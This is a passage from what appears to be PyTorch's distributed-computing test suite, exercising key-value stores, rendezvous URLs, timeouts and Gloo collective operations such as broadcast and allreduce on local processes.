CONNECT_TIMEOUT,
TEST_WITH_TSAN,
IS_WINDOWS,
)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
DEFAULT_HOSTNAME = "localhost"
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
def simple_reduce_tests(rank, world_size):
tests = [
(
c10d.ReduceOp.SUM,
torch.tensor([rank + 1.0]),
torch.tensor([float(world_size * (world_size + 1) / 2)]),
),
(
c10d.ReduceOp.PRODUCT,
torch.tensor([rank + 1.0]),
torch.tensor([float(math.factorial(world_size))]),
),
(
c10d.ReduceOp.MIN,
torch.tensor([rank + 1.0]),
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
torch.tensor([rank + 1.0]),
torch.tensor([world_size]),
),
]
# Generate tests for BAND.
# The bit that is set changes in every iteration to check
# that the output changes accordingly.
for i in range(4):
vin = rank | (1 << i)
vout = 1 << i
tests.append(
(
c10d.ReduceOp.BAND,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for BOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-OR'ed.
for i in range(1, 5):
vin = reduce(operator.or_, [rank * i + j for j in range(i)])
vout = reduce(operator.or_, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for XOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-XOR'ed.
for i in range(1, 5):
vin = reduce(operator.xor, [rank * i + j for j in range(i)])
vout = reduce(operator.xor, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BXOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
return tests
def simple_coalesced_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([rank + 1]), torch.tensor([(rank + 1) ** 2])],
[
torch.tensor([float(world_size * (world_size + 1) / 2)]),
torch.tensor(
[float(world_size * (world_size + 1) * (2 * world_size + 1) / 6)]
),
],
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([rank + 1.0]), torch.tensor([rank + 2.0])],
[
torch.tensor([float(math.factorial(world_size))]),
torch.tensor([float(math.factorial(world_size + 1))]),
],
),
(
c10d.ReduceOp.MIN,
[torch.tensor([rank + x]) for x in [0.0, 1.0]],
[torch.tensor([0.0]), torch.tensor([1.0])],
),
(
c10d.ReduceOp.MAX,
[torch.tensor([rank + x]) for x in [1.0, 2.0]],
[torch.tensor([world_size]), torch.tensor([world_size + 1.0])],
),
]
def simple_multi_input_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([2 * rank + 0.0]), torch.tensor([2 * rank + 1.0])],
torch.tensor([float(world_size * (2 * world_size - 1))]),
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([float(math.factorial(2 * world_size))]),
),
(
c10d.ReduceOp.MIN,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([2 * world_size]),
),
]
class StoreTestBase(object):
def _create_store(self, i):
raise RuntimeError("not implemented")
def _test_set_get(self, fs):
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
fs.add("key3", 2)
fs.set("key2", "value2")
fs.add("key3", 3)
fs.add("key3", 4)
fs.add("key3", 5)
fs.add("key3", 6)
self.assertEqual(fs.num_keys(), self.num_keys_total)
self.assertEqual(b"6", fs.get("key"))
self.assertEqual(b"value0", fs.get("key0"))
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key2"))
self.assertEqual(b"21", fs.get("key3"))
def test_set_get(self):
self._test_set_get(self._create_store())
def test_compare_set(self):
store = self._create_store()
missing_key_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"wrong_old_value", missing_key_result)
store.set("key0", "value0")
self.assertEqual(b"value0", store.get("key0"))
old_value_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"value0", old_value_result)
self.assertEqual(b"value0", store.get("key0"))
new_value_result = store.compare_set("key0", "value0", "new_value0")
self.assertEqual(b"new_value0", new_value_result)
self.assertEqual(b"new_value0", store.get("key0"))
# This is the number of keys used in test_set_get. Adding this as a class
# property instead of hardcoding in the test since some Store
# implementations will have differing number of keys. In the base case,
# there will be 5 keys: key, key0, key1, key2, key3.
@property
def num_keys_total(self):
return 5
class FileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(FileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
def _create_store(self):
store = c10d.FileStore(self.file.name, 1)
store.set_timeout(timedelta(seconds=300))
return store
@skip_if_win32()
class HashStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(HashStoreTest, self).setUp()
def _create_store(self):
store = c10d.HashStore()
store.set_timeout(timedelta(seconds=300))
return store
class PrefixFileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixFileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
self.filestore = c10d.FileStore(self.file.name, 1)
self.prefix = "test_prefix"
self.filestore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.filestore)
def create_tcp_store(addr, world_size=1, wait_for_workers=True):
"""
Creates a TCP store. Retries if the chosen port is already in use.
"""
ports = []
for _ in range(10):
try:
port = common.find_free_port()
ports.append(port)
return c10d.TCPStore(addr, port, world_size, True, wait_for_workers=wait_for_workers)
except RuntimeError as error:
if str(error) == "Address already in use":
continue
raise
raise RuntimeError("Unable to find free port (tried %s)" % ", ".join(ports))
class TCPStoreTest(TestCase, StoreTestBase):
def _create_store(self):
store = create_tcp_store("localhost")
store.set_timeout(timedelta(seconds=300))
return store
def test_address_already_in_use(self):
if sys.platform == "win32":
err_msg_reg = "Only one usage of each socket address*"
else:
err_msg_reg = "^Address already in use$"
with self.assertRaisesRegex(RuntimeError, err_msg_reg):
addr = "localhost"
port = common.find_free_port()
# Use noqa to silence flake8.
# Need to store in an unused variable here to ensure the first
# object is not destroyed before the second object is created.
store1 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
store2 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
# The TCPStore has 6 keys in test_set_get. It contains the 5 keys added by
# the user and one additional key used for coordinate all the workers.
@property
def num_keys_total(self):
return 6
def _test_numkeys_delkeys(self, fs):
# We start off with one init key in the store to coordinate workers
self.assertEqual(fs.num_keys(), 1)
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
self.assertEqual(fs.num_keys(), 5)
fs.delete_key("key")
self.assertEqual(fs.num_keys(), 4)
fs.set_timeout(timedelta(seconds=2))
with self.assertRaises(RuntimeError):
fs.get("key")
fs.delete_key("key0")
fs.delete_key("key3")
self.assertEqual(fs.num_keys(), 2)
fs.set("key4", "value2")
self.assertEqual(fs.num_keys(), 3)
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key4"))
def test_numkeys_delkeys(self):
self._test_numkeys_delkeys(self._create_store())
def _create_client(self, index, addr, port, world_size, messages):
try:
client_store = dist.TCPStore(addr, port, world_size, timeout=timedelta(seconds=10))
self.assertEqual("value".encode(), client_store.get("key"))
client_store.set(f"new_key{index}", f"new_value{index}")
self.assertEqual(f"next_value{index}".encode(),
client_store.compare_set(f"new_key{index}", f"new_value{index}", f"next_value{index}"))
except Exception:
messages.put('Caught exception: \n{}exiting process with exit code: {}'
.format(traceback.format_exc(), MultiProcessTestCase.TEST_ERROR_EXIT_CODE))
sys.exit(MultiProcessTestCase.TEST_ERROR_EXIT_CODE)
def _multi_worker_helper(self, world_size):
addr = DEFAULT_HOSTNAME
server_store = create_tcp_store(addr, world_size, wait_for_workers=False)
server_store.set("key", "value")
port = server_store.port
messages = mp.Queue()
processes = []
num_proccesses = random.randint(3, 5) if world_size == -1 else world_size
for i in range(num_proccesses):
p = mp.Process(target=self._create_client, args=(i, addr, port, world_size, messages))
processes.append(p)
p.start()
for p in processes:
p.join()
error_message = ""
while not messages.empty():
error_message += messages.get() + "\n"
if any([p.exitcode != 0 for p in processes]):
raise RuntimeError(error_message)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_fixed_world_size(self):
self._multi_worker_helper(5)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_nonfixed_world_size(self):
self._multi_worker_helper(-1)
class PrefixTCPStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixTCPStoreTest, self).setUp()
self.tcpstore = create_tcp_store("localhost")
self.prefix = "test_prefix"
self.tcpstore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.tcpstore)
# The PrefixTCPStore has 6 keys in test_set_get. It contains the 5 keys
# added by the user and one additional key used for coordinate all the
# workers.
@property
def num_keys_total(self):
return 6
class MyPythonStore(c10d.Store):
def __init__(self):
super(MyPythonStore, self).__init__()
self.store = dict()
def set(self, key, value):
if not isinstance(key, string_classes):
raise AssertionError("Expected set to be called with string key")
if type(value) is not bytes:
raise AssertionError("Expected set to be called with bytes value")
self.store[key] = value
def get(self, key):
value = self.store.get(key, b"")
if type(value) is not bytes:
raise AssertionError("Expected get to return bytes value")
return value
def add(self, key, value):
new = int(self.store.get(key, 0)) + value
self.set(key, bytes(str(new).encode("utf-8")))
return new
class PythonStoreTest(TestCase):
def setUp(self):
super(PythonStoreTest, self).setUp()
def test_set_get(self):
# If we were to inherit from StoreTestBase and try to use
# its test_set_get function, we would exercise the Python
# API directly, instead of going through the C++ trampoline.
# We care about testing the C++ trampoline, so run the
# equivalent of StoreTestBase.test_set_get from C++.
# See `torch/csrc/distributed/c10d/init.cpp` for the definition
# of this test function.
c10d._test_python_store(MyPythonStore())
class RendezvousTest(TestCase):
def test_unknown_handler(self):
with self.assertRaisesRegex(RuntimeError, "^No rendezvous handler"):
c10d.rendezvous("invalid://")
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
def test_common_errors(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
@retry_on_connect_failures
def test_nominal(self):
os.environ["WORLD_SIZE"] = "1"
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(common.find_free_port())
# Single rank
os.environ["RANK"] = "0"
gen0 = c10d.rendezvous("env://")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
class RendezvousFileTest(TestCase):
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "path missing"):
gen = c10d.rendezvous("file://?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?rank=0")
next(gen)
def test_nominal(self):
with tempfile.NamedTemporaryFile(delete=False) as file:
url = f'file:///{file.name.replace(os.path.sep, "/")}?world_size=2'
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(2, size0)
gen1 = c10d.rendezvous(url + "&rank=1")
store1, rank1, size1 = next(gen1)
self.assertEqual(1, rank1)
self.assertEqual(2, size1)
# Set value on both stores
store0.set("key0", "value0")
store1.set("key1", "value1")
# Cross check with get
self.assertEqual(b"value0", store1.get("key0"))
self.assertEqual(b"value1", store0.get("key1"))
@skip_if_win32()
class RendezvousTCPTest(TestCase):
def create_tcp_url(self):
addr = "localhost"
port = common.find_free_port()
url = "tcp://%s:%d?world_size=%d" % (addr, port, 1)
return url
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "port number missing"):
gen = c10d.rendezvous("tcp://127.0.0.1?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?rank=0")
next(gen)
@retry_on_connect_failures
def test_nominal(self):
url = self.create_tcp_url()
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
# Set value on the single store
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
@retry_on_connect_failures(connect_errors=(CONNECT_TIMEOUT, ADDRESS_IN_USE))
def test_tcp_store_timeout_set(self):
url = self.create_tcp_url()
test_store_timeout = timedelta(seconds=10)
gen0 = c10d.rendezvous(url + "&rank=0", timeout=test_store_timeout)
store0, rank0, size0 = next(gen0)
# this should time out in 10s. If the timeout passed into rendezvous was
# not respected, it will take much longer to timeout.
start = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
store0.get("nonexistant key")
end = time.time()
time_diff = end - start
self.assertGreater(test_store_timeout.seconds * 10, time_diff)
class TimeoutTest(TestCase):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
@requires_nccl()
@retry_on_connect_failures
def test_default_store_timeout_nccl(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
self._test_default_store_timeout("nccl")
@requires_gloo()
@retry_on_connect_failures
def test_default_store_timeout_gloo(self):
self._test_default_store_timeout("gloo")
@requires_gloo()
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupGlooTest(MultiProcessTestCase):
def setUp(self):
super(ProcessGroupGlooTest, self).setUp()
# For Windows platform, Python does not support fork, change it to spawn here.
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def opts(self, threads=2):
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [create_device(interface=LOOPBACK)]
opts._threads = threads
return opts
def test_multi_device_constructor(self):
store = c10d.FileStore(self.file_name, self.world_size)
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [
create_device(interface=LOOPBACK),
create_device(interface=LOOPBACK),
]
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, opts)
# Execute 2x the number of operations to ensure we use every device.
for work in [pg.allreduce(torch.ones(i + 1)) for i in range(4)]:
work.wait()
def test_empty_tensors(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
xs = [torch.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
def test_broadcast_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = -1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t3], opts)
def _test_broadcast_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# Every rank is root once
for i in range(self.world_size):
# Run with 1 input tensor
x = fn(torch.tensor([self.rank]))
broadcast([x], i, 0)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i]), x)
# Run with 2 input tensors
num = 2
for j in range(num):
xs = [
fn(torch.tensor([self.rank * num + 0.0])),
fn(torch.tensor([self.rank * num + 1.0])),
]
broadcast(xs, i, j)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[0])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[1])
# Test overloaded convenience function
x = torch.tensor([self.rank + 1.0])
work = pg.broadcast(x, root=0)
work.wait()
self.assertEqual(torch.tensor([1.0]), x)
def test_broadcast_basics(self):
self._test_broadcast_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_broadcast_basics_cuda(self):
self._test_broadcast_basics(lambda t: t.clone().cuda())
def _test_broadcast_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [
pg.broadcast(inputs[i], root=(i % self.world_size))
for i in range(len(inputs))
]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
torch.tensor([(i * self.world_size) + (i % self.world_size)]),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_broadcast_stress(self):
inputs = [torch.tensor([i * self.world_size + self.rank]) for i in range(1000)]
self._test_broadcast_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_broadcast_stress_cuda(self):
inputs = [
torch.tensor([i * self.world_size + self.rank]).cuda() for i in range(1000)
]
self._test_broadcast_stress(inputs)
def test_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t3], opts)
def _test_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Single input tests
tests = simple_reduce_tests(self.rank, self.world_size)
for (op, input, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensor = fn(input)
work = pg.allreduce([tensor], opts)
work.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Multi input tests
tests = simple_multi_input_reduce_tests(self.rank, self.world_size)
for (op, inputs, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors, opts)
work.wait()
for tensor in tensors:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Test overloaded convenience function (defaults to using sum)
x = fn(torch.tensor([self.rank + 1.0]))
work = pg.allreduce(x)
work.wait()
self.assertEqual(
torch.tensor([float(self.world_size * (self.world_size + 1) / 2)]), x
)
def test_allreduce_basics(self):
self._test_allreduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allreduce_basics_cuda(self):
self._test_allreduce_basics(lambda t: t.clone().cuda())
def _test_allreduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce(inputs[i]) for i in range(len(inputs))]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allreduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allreduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_allreduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allreduce_stress(inputs)
def test_allreduce_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
t2 = torch.zeros(1, dtype=torch.float64)
t3 = torch.sparse_coo_tensor([[0]], [1], size=(1,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([], opts)
with self.assertRaisesRegex(ValueError, "tensors must all have the same type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout at index"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t3], opts)
with self.assertRaisesRegex(ValueError, "unsupported layout"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t3, t3.clone()], opts)
@skip_if_lt_x_gpu(1)
def test_allreduce_coalesced_checks_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "unsupported device type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1.cuda(), t1.cuda()], opts)
def _test_allreduce_coalesced_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
test_cases = simple_coalesced_reduce_tests(self.rank, self.world_size)
for op, inputs, outputs in test_cases:
opts = c10d.AllreduceCoalescedOptions()
opts.reduceOp = op
tensors = [fn(x) for x in inputs]
work = pg.allreduce_coalesced(tensors, opts)
work.wait()
for result_tensor, expected in zip(tensors, outputs):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(result_tensor, expected)
def test_allreduce_coalesced_basics(self):
self._test_allreduce_coalesced_basics(lambda t: t.clone())
def _test_allreduce_coalesced_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce_coalesced(input) for input in inputs]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
2
* [
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
)
],
inputs[i],
msg="Mismatch in interation {}".format(i),
)
def test_allreduce_coalesced_stress(self):
inputs = [2 * [torch.tensor([i + self.rank])] for i in range(1000)]
self._test_allreduce_coalesced_stress(inputs)
def test_sparse_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1])
t2 = torch.sparse_coo_tensor([[0]], [1], size=(2,))
t3 = torch.sparse_coo_tensor([[0]], [1], size=(4,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.AllreduceOptions()
pg.allreduce([t2, t3], opts)
# Sparse allreduce only works with c10d.ReduceOp.SUM.
for op in [c10d.ReduceOp.PRODUCT, c10d.ReduceOp.MIN, c10d.ReduceOp.MAX]:
with self.assertRaisesRegex(ValueError, "unsupported reduction operation"):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
